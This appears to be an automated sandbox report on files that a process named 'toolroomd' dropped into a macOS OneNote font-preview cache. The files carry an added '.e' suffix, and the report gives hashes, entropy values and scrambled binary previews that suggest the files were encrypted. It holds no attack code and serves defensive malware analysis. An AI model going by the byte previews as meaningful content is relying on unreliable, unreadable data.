Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...4.T.Q.j(..g.....Y.d....ev...p...L..R)H..9..w...rh^.._\w...x..G.e..Q.o....\|<..-3.5..?d....._P.[..w........:/vS..TNK...v..../qR.X^.5...g.o..H..v[......7?..>M.[..E^.....^...X(.Y'2..m..w....s..KL...s.1.}@.W..C..H...A..&....~#....u...i..j.E..V.[k.......h.Gd....QQX.%R..:....w...'`{\|...xsCJa.....F....zL1.\|\..T...d@}..hg...h..#_.9.q..0/..=D~.....B.....f@..h.....Z.A..d...._]b..s......fA.q}.imC......jk........<.x..W0td=...a#t.m.v......P..-..y.}....9.b..i.x!.G.X&..8!\.o.;T..[.F.i....D..>I..y...Evd....j\|...#...\P......`..\|.T...h.^_.!... ....u}j.1.b..j...\|..........oba.J.4(....4_..y..X.....,..1.8...I....Mu.:.\3..K`.............z..h.G...R.5...S..Hj.....i..C...f..X......E..../W.....:.....a.,....4.K=?@.X...`U,....o.....Z>;..#.w.ni...T.4.4...(..r.Y.;F..4.<>.=...@....r...Bv..Fz.e[#.l.<v.>..A7,.ViE.A.k.s3.M.[..%:.<z.>h}.0..r.....w.-]W..Zh.k.]...a...m..r.x.<..]s5R.._".wa.E..).._c3.<,^..+.9?].........V1.J

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConstantiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	7.485129241212781
Encrypted:	false
SSDEEP:	24:EuM0AX6451/QF9YVxFy5sJcb/gQbZPRfE4rpzrM0RD8MsePc0m7:EP0Aqzi85sJXq1CYdzRD8MNpq
MD5:	094F4B823A4F5BB17A8F7AD6888C5F10
SHA1:	1594A90481291C4F6486F89948B70D2CC6DC3B55
SHA-256:	206CE9F3897EB8ECEAEBCBD025C96A95655C34BC4C39885003B1C45721EE0A1E
SHA-512:	48C45A70E6D7B0C31C71BD4028A0D988D55EC93A671B5787A8A34D8A1812D2D23334A2B01C6007446CA25E1BB64E381FCD970C732965163938E0843B9AC4B72E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.m.A..-..o+..#...\|5..-0..A......?.-.=..6.o......[...D.J....!.m..k..&D\..M.........N-.t....?7...S.1%.Z()....=.DM.....~...[d0.o.#..Y.[.F............z'....,.%U%.`..<.....U.Lx..b.yNZ_....9.7w.....dO.,.-}.d..1....+..G=..".qWLk.!..:`...k....5..5#.H..qqd.H.V:3.X.=..\|.]nc&.....4..`~?....{.IJ..F......O.HN.EL..7_.M..C...=w...g....`B._6A.<.ht.....6.O.+...T).8O......P.R.P.../....g#..Y _...}>.7s .d..F.yF/....U;...8... ..W..p-...Z..vm...4.e..7.Q$....S....lr..S..B/..,..x.....HC..b93j......\|m.#_.U....yq...:..s.@...1d.j9....vQ..A.\|J!<b...67..Q...8x@..?$..`.H.'..j.~x-.....0Iut..9.l..d.l...4._......qSOa..Qk..w..S..L...^\|...lR*5.........5.d.....ArS...J.X..s.uL.F..{2j...f.k.\H5MC..)h....?...#{..mPu... .....W.........z..a....F'l.....Za...o2J..p..Y... .q...4Oi.1....}.`.\e..E...)....?...y:..4.).T.......Z!.M..n......=........A.d..^d..K...../4...527........6V...._........h..+O..tp..t..J.m...x..m.TIN

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CopperplateRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1722
Entropy (8bit):	7.569925967402094
Encrypted:	false
SSDEEP:	24:EkxbP2YFmeFKimTpSIKijau3u9eFSSdP8kuEbZQEB2haj/6sZ/JpcZ3csePc0m7:EmZFUijG7FFdluGZ/whcNpq
MD5:	22E1C1A922C08257945A0C90DA319701
SHA1:	D25D559A1F4E1594DAD23D43DF1E71117CB26C3D
SHA-256:	2C7239CA7E3843101767362300D290B33B7C1965AF47C4926E13620A79B27FC2
SHA-512:	5CF770454114D680B5CF98269C6C419D9FA25194BB0BA312AC3A7710FDA2CA8C0E7E8E74F91AFACDB40EA79E29C30E38F4B495694541AD672F8D0B5CF82A46CE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a ...f\|S.\|...9..Y.?..r.!O.p.....e....Y.!.iS..ER...N~...^'.~..h._X[.Rc.nc...,.X`....jb.....han.4m~Ym...A.f.....s\..7...s\..7...s\..7...s\..7...j..?..5@<yD........,.......S...Sv.....dxzz..h@O.....u'..JIB.l.N.E.G.h.:a....?8k.....#..p ....7..j....T.,...KF>...+..`.....Ps.J.y&.Dt.x..1...\|z2.......@@...\|.#.E...T...X..........}j"....m.?..qNW..s..et1b.q......ny..~.{9_..s..Z9k.........Nr.......Yyja..;.i....v.......@.8...@...a.[..b..'.y.9..5C.@..txy.....4..q....Q. ]:..Z...X`.......oH...f.......]D{..#..D...zC.jZ[.P.......X.N....4..\|m...W{.......f......+LUSv.YV..a\]..Z.....5.\|.JV...E....%....#n......T..."W.....4LIdT._{T..6..N......H/w..G3.'..T.}..d_....="....R.Z.....\|Z........T..!x...$..Yh...+.P..uK#o.0....y.-vl..'..g....f...V>...Z..H..R.9.Ew5...-lz..'.....9.{_...x..t<....:.. ..9..vcX.#.R.7..'G....v2;.BS...~..)../#..8..........ZnH.^...Y..f.....gZ....m-8....4.C>.....i^U...T.....3......}.D....+.(...O.wvI.Rb;)

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CorbelRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	7.25187974412914
Encrypted:	false
SSDEEP:	24:EQ5HSmsQLKczMq/Ez0Y87UZDJSJaF8XdqQRsePc0m7:EuS3QLKMr/EYrQd4pXdfRNpq
MD5:	0CE0BA6BAB68421CE15546CA9354483D
SHA1:	0B509E84D9FDEADED556B29889705DC5E2568B98
SHA-256:	C2427CBF87BA901357A339B808A47667C33FCCA26131F09C85DB399E24435053
SHA-512:	654BA516BD19BEB015D4A59E05D6A60BF3D05A2ADB746CF0D1D0CBF0F9104DC86542A4959EAAF18EA12905AD55DE275D08D83C6E99D74866A27528EA587D50AF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.Z^..n^R.j.....o..-...G..D..^....Ew.Ox^.F.e....G..(.A0.6.!...<.2.Dl..'J..@.qq.;.....Z.....I..._3U7`k6.t.....Z...R.n.CI=/..]..[5.&.$k.YH.C..;...[......:.zp...4...L...M.'...h...c .\|n...rv.:...Q%.......I4..Sz....\....G.7&A.W..kW.......jy7.cOod.......5.8.j.Fm{......\.......e..=eb.y...Q.5....k....Y&..c{.e..y.K.........c1....!t.&'....H@.....#.u...>.[e..1..b..2.....#T._5.j...R.G...........h.....m<2\?..QjK..8...:....X..J`..:......P).wA}.-..].\|....X.r.....9...+a..y6.&....`..F..(1n.'.L.v.._OX4<....I.KX?H...r+K.,p.^........`..tn,....t.a..4=.P..])h=....J.....B...}..K....7.8... c.2\|.P.l/%wa_.?..t.L..E9..P.k.7...t..,...cf....D...J.>.8..7....:..p8..}.t...j...-..-:`..".....c....h.....8Quw..f..(..mP.pG?.l.F....U.p.;.C...C.w..).................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Corsiva HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1842
Entropy (8bit):	7.612388516924019
Encrypted:	false
SSDEEP:	48:EMFv+eAYK+Vo/xMx9S5vPUJW2/XVl29avuRNWfaNpq:LvwY5oJMx+UJW2/lot/u
MD5:	4FA7E16397AE899CDEB3349813329013
SHA1:	4DDA84E5ED0A931884D733B5E7E23186980A29D5
SHA-256:	13103F8FE3C1B9CEC81E1D48564A08C0B43A74C8F90262F36F0356F687ED14D3
SHA-512:	B7A481F44CC524B12C03057AEBD0EC258E29E2C1807EFCB2A6A8F123885069D19BBD40D46D2689B072EB58B218D70AC611087AA99640D51FF5AAE2580E0E81F1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...\....W........V..f.L.?[..W..]i./r....k.C....=..c,_.. .A..\|_",..P.a..$-v...w...l...9.....F.`..X................$....1.C..s..A3&..j<F...K....X.H....F..x....Y./....S:%.D5.....E...'.......HA..B.?._.2xhN....Z[BCg...@.UZ..e.]H.....X.n..a.@....f9......I....e....^..QG..../!.Zj..7l..k8.[..'Z.[^......m.Y.....m.@.Y0..JS7zB./{.zvI"(L#....&g...)@.x..BNGL.O....Ewe.L......J.......a.A.3.....!..;6"T...Z.....9...LS..X..:...x..7.V.....<........+s..eW..YH..S ../.5....<..&X.....1.}..d~.+e.[....Ma..h.hrI..y...9J..}..S..d~....]reRT..Q.....X..}...U..b/.(..k..#!..6...........y.L..z..B.Z1.M.....]a...T..X..~....BK....:+h?...m).~x...b.....-.(jt6..."1.z%W....,R8..@_.(..w.........,.Q.....!.#L..0.....D..... ..:.........$.f..-.V...1....-.w....m...h....qP^F..Tc.R..C..l...bW..2.6_.....m..V.%.k.......a..[...%\|..~j...L..\.....p....].).zS....[...<..j.0x...KNX...;u..u.P.w.......O..d.E..g#..z.....vv..b..Z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Courier NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.5630670968857325
Encrypted:	false
SSDEEP:	48:EBRCSvB+ik4Fc386LKNjnXY+qFXIOB7aNsOFA5PNpq:QRCSvxk4ateNjo+9Wu
MD5:	424136F898BE0BDBBE501C1BDDAF7463
SHA1:	782F05EEBCAA6094E84FC21C88E4254764AE3E32
SHA-256:	DE3F44982D32215A1E4D86E4E66D20728F85A1AB85E506493096CDDF5E212F32
SHA-512:	245F49D68BD9D4267B491F86FADED575C6218DD4AB3097AE7679C91AAF0ECD133F9A034D63CBF3011154302FE616946DDAF80AD36298B617215EA13E01F3DB33
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aU.....>....%.;.5....O.0.....h....U...f..j.^..A.o....,...../.......n.................@...\%.4Yw....B..F.P.......8Y......e.8W..2'.......L....~.=.B2.>\|t....9.S2.=nX.+....JecIm_T...,...`..[.{El...b.z\...^...;...Xy..(.=^>GlR.E...'.A.K..f...A..N+.^g...._6..~...0..N....F......L.{.)c\|.o....0-...q.3.W....H..\./..W....."....5.0...T#st.+....:.{...v.m...9..y......XevC..$1...h..I.)"\.@.....NV.....,.!J...r.....m.~.......f.-z_..VM...1smlJ&.V..w.i".!.b.IuJ.j...6......&.A...nm... ....O.._.G...$...t.&I..B....].]..n...!@.`. %....]B8..SP..h..X...U..<S..KG......rcL.Ok..."..l:.\N....o..r).b.Q..."...Y.(.7...H.~.`.i.....C.:__b.H....?N.[.G...M..Z..B.yf..]...53...b0.Y[;-...[. zR..F.&V."P_..........E....)Uh...Z<+y.........c..dGaq.~......3v....i...n..=...a]..[.......&.KsA.96......O.....6.3],......x..)...W..k....L.......4..@..o=.....3.5_..m.... ../...@z...i v...)........b...:$........O@g..{{s..'.e#...^q4.g.q(.3....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CourierRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.492005879895833
Encrypted:	false
SSDEEP:	24:EyeC6fbVry1O+ZMLFRuRk0YVzJv+DchlofcgulROj6kyyMsePc0m7:ETCkbByc+ZonuRCzJ2cIc3RObMNpq
MD5:	B888059BAC7CE08E907497FCE746C7DE
SHA1:	3DA5BF631D479D997C9CF5094DE9A077621B2CB2
SHA-256:	B25611DE4E11BD5BCABD000FB4C48C18A702DE2330B1ECD96FA73DDD86AB71A5
SHA-512:	2505ADC89CBD5C00B2267A98FDA62CCD776BEE486FA4E6EB23EEE5EB9FFC2B65CF94CF3A22D93490B172151FFC94E6193D1DA7346665A99CEC8277DD0EB21B0B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS......-.&re....p.....@..b!z...b....<.......J..J8.......`.......p......S.5K..U..=.Q.n..6..S...l..gP.!B....=....zHcX.).#w.Y..=<.:..S.h.C....Y..1......s..;...N.,........{.3..-..}.ANp..... ....?_....p!+.1..#..e.j..!.\..n....Wgw..L....vqt...gcXW.....A....y..9.!...u_U....o."..5K.........{.N_......4<.2.:n@.....g.J.Y..V.........4..&$xMp...s&.....8M.i..nH7IM.D)..^..Uo"J.q.2..?.Af...#....f^T.K\|...S6.A..X.(.....TD.x3..RF3.,..Q..%.$;Su^....2..l....<V6.......0.99w.).E?j[..y.kq.[....A...}..="..xs.4q...(..[..{.......<$.C....0.s.7.....6...i../av[!u.`..?.f...k...r[MA.4.Fb.o`..1.r.t\|.c.r/.lI..zw..^Y......#...G..0p..3.G...L...).....(.Zp.Yp....Q.1..IM./)..i...2.DA?....`..Dx.q..yA..K..w..f_..J;....WeN.L%.~7..\.2.[.C........."h.\.d....1*.....5.e!..f.%[[..2W`.]w..(.v..N;.e... ..>"B#}VR..N.7#...G.~?..._B..YR...F.S...O(......c........<.f.......~.ZX.K............J4....g.v...'.....d....D.n...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DIN AlternateBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.430391724035001
Encrypted:	false
SSDEEP:	24:EJjcxNky1Y06v3U83VhLDe3ycmu+D1F9qDcgLOsePc0m7:EdcxNXa0MUobD9cDC1F9qDYNpq
MD5:	A58B2949757D7ECF3728076342AD4E41
SHA1:	F449D3BC129F57BC1A1AF9C98A9A124F4C5FD8F5
SHA-256:	07B0428B409AA2A0C1E26017235FDD2399C9AA4E8BD3109FDA2234C60513FCB8
SHA-512:	8400A6445FBA26B2AA57CFAD256E9AF6B740C1391C194F8563A4B04373AA6C3DB84BD44268A92A308B159A1757FB298C1F1387B730A48BD0168264B4D9F2EE3D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aT....p..V.i..b.....e.+.../r..ZSn....C.M.Bep..7B.h...\..t.n..Y.........B...;..r.W.@.rR/..{iQ.....mC...S.....B....qP.#..........i.6\|.8.Q'\|aU..d...m.0..$.G..{..>L.)........}<.k.Hd.,&...... -..5....6{.<7Wc....2).WO$.r4.zv..:{..w...~..b=..d.3..F......$...b."...\|7...rt....y..e..T>.v2..Fv.....'...Y..U..x.`[h.l.......j.....K.X....g......4..CobY(hsY.D.....>p.t....:.<$..Q_...b.q.>.W......a.4H...F.?`...6cu...8...........\(.w.W..._..d.sY........A.......Pg......./...q>xbX._..bB.v.H..5.b....f...D....v..........n/..GX....M...a.H.....(]?..Hm........M0S.\|....L)TF/TW....J.....2R..oj..6n..}+.<Ht.O.k.2...7D@.o.<.N.L..Hem.J~...$..=.K'.....O...y.....Y.@...0s..(.Gk.\|..CL..90&....!.B..S... O0....S..t....p..V@..k;.....jo....C.bX.Z.......Y..i..}..f...2^.d.n.CNd..D....},.\~u...C.D.H.(5(...VDI............Qr.5`...w....w..+.V....g....6..7......{..;..O..<...F.V...5....X.ks.G..`.+)G...@.......!.SV."Z....Uj...0..@...'...7

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DINCondensed Bold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	730
Entropy (8bit):	6.757576937952475
Encrypted:	false
SSDEEP:	12:WvyOmwN/d5GmrNgGm0ftQ/bxLxNIivbxsFKT16w1iGsewLYTc+qGm7:EN7xrNgGPK/bxxektsFw7sePc0m7
MD5:	B930B45B4E78C9184D5AD3797B863EC8
SHA1:	19896C318736A59331F8F5BD134677E1D875AAE0
SHA-256:	01C200B43E129B61CF0FAFEF5B4182703E49713FC2B28D132A757981BC5B9A9A
SHA-512:	FF46EE4879175E8638D02F8A298C83A503F9FC69796497F02747C8DB41C2F315A6E7FA3C8B79CEB07A49146013A8FB3CE56D275372ED17CEB72EB64A091C9996
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.hy=..@;.6..=.EO.v..?..q.T.....6:.5.~.&9b......;...?bG{;(.T<)%Y.f7..:..A(pSi!....0Fu...vms.-....O.....L5B..D.@......kht.z....sn....%...u.y.bj...c.Y.=....b...d.....E.$.Pq.._...q.;..Ht._..w..[........j....+0.v..R..C.9..].EZ4.."Z.{..cY.!..0....L.vc..b......d..F2.+....y......Y....l..`c..&.....,...yOX...f(`.F..FH?8@m.{........&..o..h...w....U..u....>..?...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	7.572041079198455
Encrypted:	false
SSDEEP:	48:3V9RRjRHnepNg9TwsAuGRhL/ApVIVW49KkZ8lckNpq:3V9RRRHep+ws30hTAJs8lu
MD5:	CAD9D202EE4CF3ABA9041FEFB8E63CFE
SHA1:	C4A91587544C988EC28CEB4258A7BDC6C4A689BD
SHA-256:	C31DB491EC37BEFA7B6CFC1FCFBA4FC6810ECD708745A77D7650B73BDC482F3F
SHA-512:	1557FAB98A76414774040BEF54E424345C2C0A9473F3ACBA71AA28007751014BC45A2EC8A49BA38688E534611BA4FA6BBC805E69DC1A7B4AB4C32E3A55A52C0A
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a..a+..I..kz.&.%..z.+.?y.i..,....B..@.k...."...W.4...1..b.r......Ws.3..>#>z......\|..K......xR2-&..O........5.......qP.#..........i.6\|.8.Q'\|aU..%.7=........r......)....\......C.u=C....5+.76.(.s.h....pGN.w..}Z.X^....J&XNL...3]S.<6..~s....../M..:L.Nw.:....2............4K....K............o..~...L..KH}p...!...H4../.].%%.`U.7.yr...T..JJ-B.."..."....V.R3U......XE.tCh.=......*..m9......^.9I.....<.....O......].)...1...je....A:7. ....b.>7G....h...D./@.............y.8O...r.^.%.z}..BvU.Mbp:.....l;2...]...E.I/..c...D.TN...S.m....\..[....4.N...,B..R.[X._.aL...1\...k..`x......$..n.vP.....ce.G.5'.n.?.u&7.W.]..w.Z...(.....;.Q.....KF...'6.....c.....^B..RA.....g.E'...G..H0...e..K..!....>.S0.k.W....Fl7..s.o7...q......AT..e.G+M.rk.M ....R..........I....].W2!.}mx..4a.c..>...iU-.c8.oG..OI.e$<..i.rI..4.w...x.5...a....^4..]..z...abl......}~.Z.`.)....O..n.;...b.....V=....V...6.rsK3.....=...<S&O-..A..3...#.]6...<...m

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.672505921943168
Encrypted:	false
SSDEEP:	48:ETK24Q9kRBqf009+akjXYaUI3PewK1pJNpq:KV9d009FQYaUqpK1pJu
MD5:	B753BC14081648347FDE60C73AC2DC33
SHA1:	4F665C7B7178FF8B091A5D8D051E44E0DA052C40
SHA-256:	2D9BBDBE524D7F80960C30CE1675008B20A15044990A3CD8023CD40BAC10A80D
SHA-512:	97C0F2052444C0CF6B37F0331CBF168C3691D25152BAD911543B5070524DE7221847C0DA18F829C5A673AABE817A05E85B09D68088F5900DFDB694F0A7D7E09F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8l\|.5....@...".Y-V....\|........4A...&....5^...}.)..U...uv.J$...x1-!..U.N8.M...._..u1N...`d......;..1[.!_... .Cp._....Cp._....Cp._..."..4.U....A;..l.....=..D.h.......m....j....._.8k...:2.}....Y.E..#%_......j.~li.Z.K....1V.\|W.....7w...%BX.=.c.X....'.=\|..Ga9.MN..w~....hw.J:.....9..G..R.Y.Y]l....C.9.D.L......\|8C.YD..C>.6.?..'...x,..6E..oL.Csc....%H..0.gZ..i. U.v.*.S.<..$....}\.X,?s.x........^...F/.....U.CW...i........;........eK/....../..#=....VN....d..H)A.@..@.Xi._D........Al....T......w..4!'.T.._....`...r..!.).J..P...6..F.......z.-%5..7.I....Y..W.p....w.fY4........(.y..x.>.P)...F8.=.`..%Fa..!E;O....~V..x..f.c.`..(.)......)A..........".s.Z....b&.r\|....oq..z..ff%.B..oZ..)[........nG.Ss...,..R......$.Y.r.]E'.P`.0..S..FQ.mL<.Q.sG.....>=.u..@.@......O.4.I[!...avZ`....i...^....R....<..wN...Ew....7...3;.....p.....\|%.%\......^....F..g.K.2..v%0...N....#..}oA7\.......eQ...t>.o......@.9.....j=...y.p..gy"

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DidotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1002
Entropy (8bit):	7.149176471980692
Encrypted:	false
SSDEEP:	24:EZNEddCECbJP71ubabcAqCxrissePc0m7:E/Lv7bRFJisNpq
MD5:	960DDB473A3A1D70A05712287BCBFAC7
SHA1:	E05419B67D5A3831752590847F717D0F35DF4418
SHA-256:	F4BE4493CCBC2F2A73FC471D7A1AD61B21E6E4C3F51A8F7EEAEE882A074389F3
SHA-512:	789C50685C7E96233D2F6A900344B879C3828373C116F24516B9993A50A3B2DB54B6FB530C776AB05B8F5B392E1C5118531B7B99218267A8FBABC3B8FB35E0C3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.............{..v......7.(.in.2W0...R..c.F.E..n.6.P\|c..h..J~.).pH_!..^....&..XA.v3m......"'.9..g.).K.J.;7...k......X...Inl>b.U..(=..j....:v..]..=.&..%....Jy$....s...xr...h..;.\K.7..U..H..WK.;..N..C~.=z.z(....D.4.~....ga{.....].G'..@..5...;an..,Y.`.;(..r.d^..mw...H..7.:v%..NJ.....QQ]c..E'..A..?P...g~........)...b.HT.....zu.C....V..w.<...^.A&`TN.t...N..u...Pwk.[.B.3b..,\.}.......T..[.....h..He..O.ikJ:O......j#(.......R_....y.Y...,(..x=.#.{O....;.W\.+.F&.d...FK....s..r....)>...^:..u....5..w.+.\)DW..n[eYRU.k..p.HRf.....H....B........c[..Y.'.4..9[.i.@..$H..b...,..s"s..}m........U..G ..$..{..n......U..u,b.c.a.!...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DotumCheRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1258
Entropy (8bit):	7.411394395768512
Encrypted:	false
SSDEEP:	24:E3lLGFpmgrO118WmHl+81RcWua0J7B3D64LixsePc0m7:E3lLGF3asFRur3D64ixNpq
MD5:	B40649CADEE89A61C7953EABA79D7D68
SHA1:	DB3CA2C6F3D37A25BCD4F0C7F4E4E37137EF3E14
SHA-256:	C852DEE351572F25246BB63EB5CED9DD99EAB392DE1BD02E6A352E16EF447838
SHA-512:	A47E21400A6DF1D0B0559BAFC714A92B2A8655A5D89AF384B97139E727621CBA36A4AAB6D62654CE788F7A5D70EE1B81C28AA44F9CE646A7A2B840ACDDD91A09
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aCM).V..r..!..........>...@..........!#.Q....$.%..C#~/.s....cEt.D...L..0Z......fH....Y4...%>>R.+.....\|...#..!SMp...>.\...,%_.f..t.f....JvE....T..4.1i..Y....so...#8..p....Y..{T0.5.... .r.....a..K.2/...;A....bL.G.J........yEg.J...}..?...K..a.zh.\.5.9.jP..D..n.....C..GP.$.....F...x3.u.8....B....7..g...r[..GI!......N..`..?..I.....3E..gJ....M.{. .`N.ZG=:..@..s..,..a Q..l......WZ....&.P...p/.?.B..T...W(.$.".6...N.HH.^....C.e'.?).<.tD.....M.s.&...].....F.....a........KQ...v.YTG.M.r.......\.........-......C.l....x.2}d...l5 .7.B...xB....)7..\|.7..'TOS%G.I......v.oE.@.p\OTl..~.?.=..q..\P.%.7.A..u2Z.Q..U.)\|.2....$"...'n.....yx.yA#A...S...0=........S8K.b..Z6g,.m.y..;hU..G...l_.BB.J...q......~..S....z.K.........w.6......J.......3.3+.....U.;.6....<!.....j\|-y.?r..N..4.....i.@.z.G...q.ci;'8...!....s.w..`P.o.N...8.E.P..l.Dc...0.u....6..Z..6.......OC....[n.j.R..-...................\.........^./k..`R..V5..jd..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DotumRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	7.199942480565921
Encrypted:	false
SSDEEP:	24:E9BrRKvpU7NPfALzDaqVDgv2cw09SmK9msePc0m7:E9BFKva7NC/afs09MmNpq
MD5:	EB71FF307C76DD060F6BF8F50EF60887
SHA1:	9000978252C87A06FA03AA8C9CA1ACE017E470BA
SHA-256:	410F7E8C7EECA3B4A267EBB65C2A6E6F2357437C217E65F1864CDF89BC965A66
SHA-512:	1F56E1DD9BB9640982EE9DDCC1F0CFE8A6693B03EA13E1F18FC7FE7F15CCEFEDEEEEFE1402CC49B63F57229FEA4AFC2E270CE7B4F452D2F1A1254B5D4B803F58
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a_.$..............L....e.......d..5.c.n=Q..q..9..`......[.P.`.l.<.0.n....E..Set..6Y.....V..E..l.,.fP.c.g....I..\|.+g.?%o.?LYp.1...N.......".Z.'Gx.....8$h.h.P..U..k.;.(.8.M.R~.....?.Z$....hm.P..(...:2.heh.D.o0..H.ZR.....m8"....:nGq., %O..Ty..+.40t>...()...a../.:..K..w56.wk.gz),.......VU. .>..$.H..3#..<e..5u....`Y..%J..(.pjl.(2..3..y.._. .D.....S...iPC1YL.'......p\|.in...;.....6x.{.;.>GM....S.4............DEg/........Bh..._......."hv.W.\`..T...NL.\|L.~:.V.#....jF..S..Cy.).z...6.=.<.._.s.=a.B..~.`.(<1.'.w...PC.3"..j...._.K..r..wM......@^.l..N.j......v........o.v....h..b..3.w.<#.S....u.6F.vAyJ.3.t4.R......k..."...........K .H}wg.......D2...1.,0.$j=%..,K.........................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DubaiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.21465350027896
Encrypted:	false
SSDEEP:	12:W6AAALbNQC3YfuQvmxOY0lhpmjU+OqVbT2bL/4OO7Sta7HVi7AYzWsewLYTc+qGq:+LiXv8KlnmjUKVorVOS8HVNSWsePc0m7
MD5:	856270DA6EC1FD744684ABC41F5E3571
SHA1:	F118BE1A5D276248DE8421AA27EE5866862C3BBB
SHA-256:	3BBCC1291845706D952B661A27B4962DDCEEE62DAA0426804BF0A2B3FBB70531
SHA-512:	A47A5E823F4BE105D7DDF125AE1705B7097D130F775BD02887792F07178E4171D5A74445FADFA2AB0D4063897EB61FA121BFC2942B533E3696A8F0B5F1737935
Malicious:	false
